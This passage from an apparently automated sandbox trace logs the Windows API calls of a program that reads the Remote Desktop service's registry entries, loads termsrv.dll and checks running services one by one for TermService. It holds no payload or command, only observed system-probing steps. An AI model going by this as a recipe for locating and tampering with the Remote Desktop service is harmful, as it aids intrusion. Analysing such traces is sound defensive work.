dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0316.364] SetFilePointer (in: hFile=0x368, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0316.364] WriteFile (in: hFile=0x368, lpBuffer=0x48a0048*, nNumberOfBytesToWrite=0x3defd, lpNumberOfBytesWritten=0x488fefc, lpOverlapped=0x0 | out: lpBuffer=0x48a0048*, lpNumberOfBytesWritten=0x488fefc*=0x3defd, lpOverlapped=0x0) returned 1 [0316.369] CloseHandle (hObject=0x368) returned 1 [0316.377] GetProcessHeap () returned 0x650000 [0316.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x48a0048 | out: hHeap=0x650000) returned 1 [0316.379] ReleaseMutex (hMutex=0x364) returned 0 [0316.379] CloseHandle (hObject=0x364) returned 1 [0316.379] VirtualFree (lpAddress=0x4890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.380] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Services\\TermService") returned 45 [0316.380] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0316.381] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Services\\TermService") returned 45 [0316.381] lstrcpyW (in: lpString1=0x3790000, lpString2="SYSTEM\\CurrentControlSet\\Services\\TermService" | out: lpString1="SYSTEM\\CurrentControlSet\\Services\\TermService") returned="SYSTEM\\CurrentControlSet\\Services\\TermService" [0316.381] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters") returned 56 [0316.381] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x4890000 [0316.381] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters") returned 56 [0316.381] lstrcpyW (in: lpString1=0x4890000, lpString2="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters" | out: lpString1="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters") returned="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters" [0316.381] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\TermService", ulOptions=0x0, samDesired=0x20119, phkResult=0x488ff04 | out: phkResult=0x488ff04*=0x364) returned 0x0 [0316.382] lstrlenW (lpString="ImagePath") returned 9 [0316.382] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x49a0000 [0316.382] lstrlenW (lpString="ImagePath") returned 9 [0316.382] lstrcpyW (in: lpString1=0x49a0000, lpString2="ImagePath" | out: lpString1="ImagePath") returned="ImagePath" [0316.382] RegQueryValueExW (in: hKey=0x364, lpValueName="ImagePath", lpReserved=0x0, lpType=0x488fec8, lpData=0x0, lpcbData=0x488fecc*=0x0 | out: lpType=0x488fec8*=0x2, lpData=0x0, lpcbData=0x488fecc*=0x68) returned 0x0 [0316.382] GetProcessHeap () returned 0x650000 [0316.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x68) returned 0x681d48 [0316.382] RegQueryValueExW (in: hKey=0x364, lpValueName="ImagePath", lpReserved=0x0, lpType=0x488fec8, lpData=0x681d48, lpcbData=0x488fecc*=0x68 | out: lpType=0x488fec8*=0x2, lpData="%SystemRoot%\\System32\\svchost.exe -k NetworkService", lpcbData=0x488fecc*=0x68) returned 0x0 [0316.382] GetProcessHeap () returned 0x650000 [0316.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x68) returned 0x681db8 [0316.383] GetProcessHeap () returned 0x650000 [0316.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681d48 | out: hHeap=0x650000) returned 1 [0316.383] VirtualFree (lpAddress=0x49a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.384] RegCloseKey (hKey=0x364) returned 0x0 [0316.384] GetProcessHeap () returned 0x650000 [0316.384] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xd2) returned 0x6843d8 [0316.384] lstrlenW (lpString="%SystemRoot%\\System32\\svchost.exe -k NetworkService") returned 51 [0316.384] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x49a0000 [0316.385] lstrlenW (lpString="%SystemRoot%\\System32\\svchost.exe -k NetworkService") returned 51 [0316.385] lstrcpyW (in: lpString1=0x49a0000, lpString2="%SystemRoot%\\System32\\svchost.exe -k NetworkService" | out: lpString1="%SystemRoot%\\System32\\svchost.exe -k NetworkService") returned="%SystemRoot%\\System32\\svchost.exe -k NetworkService" [0316.385] GetProcessHeap () returned 0x650000 [0316.385] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6843d8 | out: hHeap=0x650000) returned 1 [0316.385] GetProcessHeap () returned 0x650000 [0316.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681db8 | out: hHeap=0x650000) returned 1 [0316.386] StrStrW (lpFirst="%SystemRoot%\\System32\\svchost.exe -k NetworkService", lpSrch="svchost.exe") returned="svchost.exe -k NetworkService" [0316.386] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters", ulOptions=0x0, samDesired=0x20119, phkResult=0x488ff04 | out: phkResult=0x488ff04*=0x364) returned 0x0 [0316.386] lstrlenW (lpString="ServiceDll") returned 10 [0316.386] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x49b0000 [0316.386] lstrlenW (lpString="ServiceDll") returned 10 [0316.386] lstrcpyW (in: lpString1=0x49b0000, lpString2="ServiceDll" | out: lpString1="ServiceDll") returned="ServiceDll" [0316.387] RegQueryValueExW (in: hKey=0x364, lpValueName="ServiceDll", lpReserved=0x0, lpType=0x488fec8, lpData=0x0, lpcbData=0x488fecc*=0x0 | out: lpType=0x488fec8*=0x2, lpData=0x0, lpcbData=0x488fecc*=0x44) returned 0x0 [0316.387] GetProcessHeap () returned 0x650000 [0316.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x685db0 [0316.387] RegQueryValueExW (in: hKey=0x364, lpValueName="ServiceDll", lpReserved=0x0, lpType=0x488fec8, lpData=0x685db0, lpcbData=0x488fecc*=0x44 | out: lpType=0x488fec8*=0x2, lpData="%SystemRoot%\\System32\\termsrv.dll", lpcbData=0x488fecc*=0x44) returned 0x0 [0316.387] GetProcessHeap () returned 0x650000 [0316.387] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x44) returned 0x686210 [0316.387] GetProcessHeap () returned 0x650000 [0316.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x685db0 | out: hHeap=0x650000) returned 1 [0316.387] VirtualFree (lpAddress=0x49b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.388] GetProcessHeap () returned 0x650000 [0316.388] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8a) returned 0x681d48 [0316.388] lstrlenW (lpString="%SystemRoot%\\System32\\termsrv.dll") returned 33 [0316.388] VirtualAlloc (lpAddress=0x0, dwSize=0x44, flAllocationType=0x3000, flProtect=0x4) returned 0x49b0000 [0316.389] lstrlenW (lpString="%SystemRoot%\\System32\\termsrv.dll") returned 33 [0316.389] lstrcpyW (in: lpString1=0x49b0000, lpString2="%SystemRoot%\\System32\\termsrv.dll" | out: lpString1="%SystemRoot%\\System32\\termsrv.dll") returned="%SystemRoot%\\System32\\termsrv.dll" [0316.389] GetProcessHeap () returned 0x650000 [0316.389] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681d48 | out: hHeap=0x650000) returned 1 [0316.389] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\System32\\termsrv.dll", lpDst=0x488fad8, nSize=0x1ff | out: lpDst="C:\\Windows\\System32\\termsrv.dll") returned 0x20 [0316.389] lstrlenW (lpString="C:\\Windows\\System32\\termsrv.dll") returned 31 [0316.390] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x49c0000 [0316.390] lstrlenW (lpString="C:\\Windows\\System32\\termsrv.dll") returned 31 [0316.390] lstrcpyW (in: lpString1=0x49c0000, lpString2="C:\\Windows\\System32\\termsrv.dll" | out: lpString1="C:\\Windows\\System32\\termsrv.dll") returned="C:\\Windows\\System32\\termsrv.dll" [0316.390] lstrlenW (lpString="C:\\Windows\\System32\\termsrv.dll") returned 31 [0316.390] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x49d0000 [0316.391] lstrcpyW (in: lpString1=0x49d0000, lpString2="C:\\Windows\\System32\\termsrv.dll" | out: lpString1="C:\\Windows\\System32\\termsrv.dll") returned="C:\\Windows\\System32\\termsrv.dll" [0316.391] VirtualFree (lpAddress=0x49c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.392] VirtualFree (lpAddress=0x49b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.392] RegCloseKey (hKey=0x364) returned 0x0 [0316.433] VirtualFree (lpAddress=0x49a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.447] GetProcessHeap () returned 0x650000 [0316.447] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686210 | out: hHeap=0x650000) returned 1 [0316.471] VirtualFree (lpAddress=0x4890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.472] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0316.473] LoadLibraryExW (lpLibFileName="C:\\Windows\\System32\\termsrv.dll", hFile=0x0, dwFlags=0x2) returned 0x49e0001 [0317.028] FindResourceW (hModule=0x49e0001, lpName=0x1, lpType=0x10) returned 0x4ad5350 [0317.032] LoadResource (hModule=0x49e0001, hResInfo=0x4ad5350) returned 0x4ad53a0 [0317.032] FreeLibrary (hLibModule=0x49e0001) returned 1 [0317.033] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName="ServicesActive", dwDesiredAccess=0x5) returned 0x6ad3c8 [0317.039] EnumServicesStatusExW (in: hSCManager=0x6ad3c8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc) returned 0 [0317.176] GetProcessHeap () returned 0x650000 [0317.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x60b6) returned 0x6cc7b0 [0317.178] EnumServicesStatusExW (in: hSCManager=0x6ad3c8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x6cc7b0, cbBufSize=0x60b6, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc, pszGroupName=0x0 | out: lpServices=0x6cc7b0, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc) returned 1 [0317.181] CloseServiceHandle (hSCObject=0x6ad3c8) returned 1 [0317.182] lstrlenW (lpString="AJRouter") returned 8 [0317.182] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.182] lstrlenW (lpString="AJRouter") returned 8 [0317.182] lstrcpyW (in: lpString1=0x3790000, lpString2="AJRouter" | out: lpString1="AJRouter") returned="AJRouter" [0317.182] lstrcmpW (lpString1="AJRouter", lpString2="TermService") returned -1 [0317.183] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.184] lstrlenW (lpString="ALG") returned 3 [0317.184] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.184] lstrlenW (lpString="ALG") returned 3 [0317.184] lstrcpyW (in: lpString1=0x3790000, lpString2="ALG" | out: lpString1="ALG") returned="ALG" [0317.184] lstrcmpW (lpString1="ALG", lpString2="TermService") returned -1 [0317.184] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.185] lstrlenW (lpString="AppIDSvc") returned 8 [0317.185] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.186] lstrlenW (lpString="AppIDSvc") returned 8 [0317.186] lstrcpyW (in: lpString1=0x3790000, lpString2="AppIDSvc" | out: lpString1="AppIDSvc") returned="AppIDSvc" [0317.186] lstrcmpW (lpString1="AppIDSvc", lpString2="TermService") returned -1 [0317.186] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.187] lstrlenW (lpString="Appinfo") returned 7 [0317.187] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.188] lstrlenW (lpString="Appinfo") returned 7 [0317.188] lstrcpyW (in: lpString1=0x3790000, lpString2="Appinfo" | out: lpString1="Appinfo") returned="Appinfo" [0317.188] lstrcmpW (lpString1="Appinfo", lpString2="TermService") returned -1 [0317.188] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.189] lstrlenW (lpString="AppMgmt") returned 7 [0317.189] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.189] lstrlenW (lpString="AppMgmt") returned 7 [0317.189] lstrcpyW (in: lpString1=0x3790000, lpString2="AppMgmt" | out: lpString1="AppMgmt") returned="AppMgmt" [0317.189] lstrcmpW (lpString1="AppMgmt", lpString2="TermService") returned -1 [0317.189] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.190] lstrlenW (lpString="AppReadiness") returned 12 [0317.190] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.191] lstrlenW (lpString="AppReadiness") returned 12 [0317.191] lstrcpyW (in: lpString1=0x3790000, lpString2="AppReadiness" | out: lpString1="AppReadiness") returned="AppReadiness" [0317.191] lstrcmpW (lpString1="AppReadiness", lpString2="TermService") returned -1 [0317.191] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.192] lstrlenW (lpString="AppXSvc") returned 7 [0317.192] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.193] lstrlenW (lpString="AppXSvc") returned 7 [0317.193] lstrcpyW (in: lpString1=0x3790000, lpString2="AppXSvc" | out: lpString1="AppXSvc") returned="AppXSvc" [0317.305] lstrcmpW (lpString1="AppXSvc", lpString2="TermService") returned -1 [0317.305] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.307] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0317.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.307] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0317.307] lstrcpyW (in: lpString1=0x3790000, lpString2="AudioEndpointBuilder" | out: lpString1="AudioEndpointBuilder") returned="AudioEndpointBuilder" [0317.307] lstrcmpW (lpString1="AudioEndpointBuilder", lpString2="TermService") returned -1 [0317.307] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.308] lstrlenW (lpString="Audiosrv") returned 8 [0317.308] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.309] lstrlenW (lpString="Audiosrv") returned 8 [0317.309] lstrcpyW (in: lpString1=0x3790000, lpString2="Audiosrv" | out: lpString1="Audiosrv") returned="Audiosrv" [0317.309] lstrcmpW (lpString1="Audiosrv", lpString2="TermService") returned -1 [0317.309] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.310] lstrlenW (lpString="AxInstSV") returned 8 [0317.310] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.310] lstrlenW (lpString="AxInstSV") returned 8 [0317.311] lstrcpyW (in: lpString1=0x3790000, lpString2="AxInstSV" | out: lpString1="AxInstSV") returned="AxInstSV" [0317.311] lstrcmpW (lpString1="AxInstSV", lpString2="TermService") returned -1 [0317.311] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.311] lstrlenW (lpString="BDESVC") returned 6 [0317.311] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.312] lstrlenW (lpString="BDESVC") returned 6 [0317.312] lstrcpyW (in: lpString1=0x3790000, lpString2="BDESVC" | out: lpString1="BDESVC") returned="BDESVC" [0317.312] lstrcmpW (lpString1="BDESVC", lpString2="TermService") returned -1 [0317.312] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.313] lstrlenW (lpString="BFE") returned 3 [0317.313] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.313] lstrlenW (lpString="BFE") returned 3 [0317.313] lstrcpyW (in: lpString1=0x3790000, lpString2="BFE" | out: lpString1="BFE") returned="BFE" [0317.313] lstrcmpW (lpString1="BFE", lpString2="TermService") returned -1 [0317.313] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.314] lstrlenW (lpString="BITS") returned 4 [0317.314] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.315] lstrlenW (lpString="BITS") returned 4 [0317.315] lstrcpyW (in: lpString1=0x3790000, lpString2="BITS" | out: lpString1="BITS") returned="BITS" [0317.315] lstrcmpW (lpString1="BITS", lpString2="TermService") returned -1 [0317.315] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.315] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0317.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.316] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0317.316] lstrcpyW (in: lpString1=0x3790000, lpString2="BrokerInfrastructure" | out: lpString1="BrokerInfrastructure") returned="BrokerInfrastructure" [0317.316] lstrcmpW (lpString1="BrokerInfrastructure", lpString2="TermService") returned -1 [0317.316] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.316] lstrlenW (lpString="Browser") returned 7 [0317.316] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.317] lstrlenW (lpString="Browser") returned 7 [0317.317] lstrcpyW (in: lpString1=0x3790000, lpString2="Browser" | out: lpString1="Browser") returned="Browser" [0317.317] lstrcmpW (lpString1="Browser", lpString2="TermService") returned -1 [0317.317] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.317] lstrlenW (lpString="BthHFSrv") returned 8 [0317.318] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.318] lstrlenW (lpString="BthHFSrv") returned 8 [0317.318] lstrcpyW (in: lpString1=0x3790000, lpString2="BthHFSrv" | out: lpString1="BthHFSrv") returned="BthHFSrv" [0317.318] lstrcmpW (lpString1="BthHFSrv", lpString2="TermService") returned -1 [0317.318] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.319] lstrlenW (lpString="bthserv") returned 7 [0317.319] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.319] lstrlenW (lpString="bthserv") returned 7 [0317.319] lstrcpyW (in: lpString1=0x3790000, lpString2="bthserv" | out: lpString1="bthserv") returned="bthserv" [0317.319] lstrcmpW (lpString1="bthserv", lpString2="TermService") returned -1 [0317.319] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.321] lstrlenW (lpString="CDPSvc") returned 6 [0317.322] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.322] lstrlenW (lpString="CDPSvc") returned 6 [0317.322] lstrcpyW (in: lpString1=0x3790000, lpString2="CDPSvc" | out: lpString1="CDPSvc") returned="CDPSvc" [0317.322] lstrcmpW (lpString1="CDPSvc", lpString2="TermService") returned -1 [0317.322] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.323] lstrlenW (lpString="CertPropSvc") returned 11 [0317.323] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.323] lstrlenW (lpString="CertPropSvc") returned 11 [0317.323] lstrcpyW (in: lpString1=0x3790000, lpString2="CertPropSvc" | out: lpString1="CertPropSvc") returned="CertPropSvc" [0317.323] lstrcmpW (lpString1="CertPropSvc", lpString2="TermService") returned -1 [0317.323] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.324] lstrlenW (lpString="ClickToRunSvc") returned 13 [0317.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.324] lstrlenW (lpString="ClickToRunSvc") returned 13 [0317.324] lstrcpyW (in: lpString1=0x3790000, lpString2="ClickToRunSvc" | out: lpString1="ClickToRunSvc") returned="ClickToRunSvc" [0317.324] lstrcmpW (lpString1="ClickToRunSvc", lpString2="TermService") returned -1 [0317.324] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.325] lstrlenW (lpString="ClipSVC") returned 7 [0317.325] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.325] lstrlenW (lpString="ClipSVC") returned 7 [0317.325] lstrcpyW (in: lpString1=0x3790000, lpString2="ClipSVC" | out: lpString1="ClipSVC") returned="ClipSVC" [0317.325] lstrcmpW (lpString1="ClipSVC", lpString2="TermService") returned -1 [0317.325] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.326] lstrlenW (lpString="COMSysApp") returned 9 [0317.326] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.326] lstrlenW (lpString="COMSysApp") returned 9 [0317.326] lstrcpyW (in: lpString1=0x3790000, lpString2="COMSysApp" | out: lpString1="COMSysApp") returned="COMSysApp" [0317.326] lstrcmpW (lpString1="COMSysApp", lpString2="TermService") returned -1 [0317.326] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.327] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0317.327] VirtualAlloc (lpAddress=0x0, dwSize=0x2e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.327] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0317.327] lstrcpyW (in: lpString1=0x3790000, lpString2="CoreMessagingRegistrar" | out: lpString1="CoreMessagingRegistrar") returned="CoreMessagingRegistrar" [0317.327] lstrcmpW (lpString1="CoreMessagingRegistrar", lpString2="TermService") returned -1 [0317.327] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.328] lstrlenW (lpString="CryptSvc") returned 8 [0317.328] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.329] lstrlenW (lpString="CryptSvc") returned 8 [0317.329] lstrcpyW (in: lpString1=0x3790000, lpString2="CryptSvc" | out: lpString1="CryptSvc") returned="CryptSvc" [0317.329] lstrcmpW (lpString1="CryptSvc", lpString2="TermService") returned -1 [0317.329] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.330] lstrlenW (lpString="CscService") returned 10 [0317.330] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.330] lstrlenW (lpString="CscService") returned 10 [0317.330] lstrcpyW (in: lpString1=0x3790000, lpString2="CscService" | out: lpString1="CscService") returned="CscService" [0317.330] lstrcmpW (lpString1="CscService", lpString2="TermService") returned -1 [0317.330] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.331] lstrlenW (lpString="DcomLaunch") returned 10 [0317.331] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.331] lstrlenW (lpString="DcomLaunch") returned 10 [0317.332] lstrcpyW (in: lpString1=0x3790000, lpString2="DcomLaunch" | out: lpString1="DcomLaunch") returned="DcomLaunch" [0317.332] lstrcmpW (lpString1="DcomLaunch", lpString2="TermService") returned -1 [0317.332] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.332] lstrlenW (lpString="DcpSvc") returned 6 [0317.332] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.333] lstrlenW (lpString="DcpSvc") returned 6 [0317.333] lstrcpyW (in: lpString1=0x3790000, lpString2="DcpSvc" | out: lpString1="DcpSvc") returned="DcpSvc" [0317.333] lstrcmpW (lpString1="DcpSvc", lpString2="TermService") returned -1 [0317.333] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.334] lstrlenW (lpString="defragsvc") returned 9 [0317.334] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.337] lstrlenW (lpString="defragsvc") returned 9 [0317.337] lstrcpyW (in: lpString1=0x3790000, lpString2="defragsvc" | out: lpString1="defragsvc") returned="defragsvc" [0317.338] lstrcmpW (lpString1="defragsvc", lpString2="TermService") returned -1 [0317.338] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.338] lstrlenW (lpString="DeviceAssociationService") returned 24 [0317.338] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.339] lstrlenW (lpString="DeviceAssociationService") returned 24 [0317.339] lstrcpyW (in: lpString1=0x3790000, lpString2="DeviceAssociationService" | out: lpString1="DeviceAssociationService") returned="DeviceAssociationService" [0317.339] lstrcmpW (lpString1="DeviceAssociationService", lpString2="TermService") returned -1 [0317.339] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.340] lstrlenW (lpString="DeviceInstall") returned 13 [0317.340] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.340] lstrlenW (lpString="DeviceInstall") returned 13 [0317.340] lstrcpyW (in: lpString1=0x3790000, lpString2="DeviceInstall" | out: lpString1="DeviceInstall") returned="DeviceInstall" [0317.340] lstrcmpW (lpString1="DeviceInstall", lpString2="TermService") returned -1 [0317.340] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.341] lstrlenW (lpString="DevQueryBroker") returned 14 [0317.341] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.341] lstrlenW (lpString="DevQueryBroker") returned 14 [0317.341] lstrcpyW (in: lpString1=0x3790000, lpString2="DevQueryBroker" | out: lpString1="DevQueryBroker") returned="DevQueryBroker" [0317.341] lstrcmpW (lpString1="DevQueryBroker", lpString2="TermService") returned -1 [0317.342] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.342] lstrlenW (lpString="Dhcp") returned 4 [0317.342] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.343] lstrlenW (lpString="Dhcp") returned 4 [0317.343] lstrcpyW (in: lpString1=0x3790000, lpString2="Dhcp" | out: lpString1="Dhcp") returned="Dhcp" [0317.343] lstrcmpW (lpString1="Dhcp", lpString2="TermService") returned -1 [0317.343] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.343] lstrlenW (lpString="diagnosticshub.standardcollector.service") returned 40 [0317.343] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.344] lstrlenW (lpString="diagnosticshub.standardcollector.service") returned 40 [0317.344] lstrcpyW (in: lpString1=0x3790000, lpString2="diagnosticshub.standardcollector.service" | out: lpString1="diagnosticshub.standardcollector.service") returned="diagnosticshub.standardcollector.service" [0317.344] lstrcmpW (lpString1="diagnosticshub.standardcollector.service", lpString2="TermService") returned -1 [0317.344] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.345] 